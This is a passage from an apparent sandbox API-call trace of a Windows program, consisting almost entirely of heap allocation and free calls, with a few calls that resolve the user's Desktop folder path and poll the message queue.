dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0089.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0089.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0089.993] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.994] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6338 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75ee8 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6338 | out: hHeap=0x2af0000) returned 1 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0089.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0089.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0089.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0089.995] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0089.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0089.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.996] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63a8 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63a8 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0089.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0089.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0089.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0089.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0089.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0089.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0089.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0089.998] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0089.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0089.998] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0089.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0089.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0089.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0089.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0089.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0089.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0089.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0089.999] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0089.999] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0089.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0089.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0089.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0089.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0089.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0090.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.000] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0090.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0090.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0090.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0090.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0090.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0090.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.001] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0090.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0090.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0090.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0090.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0090.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0090.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0090.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0090.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 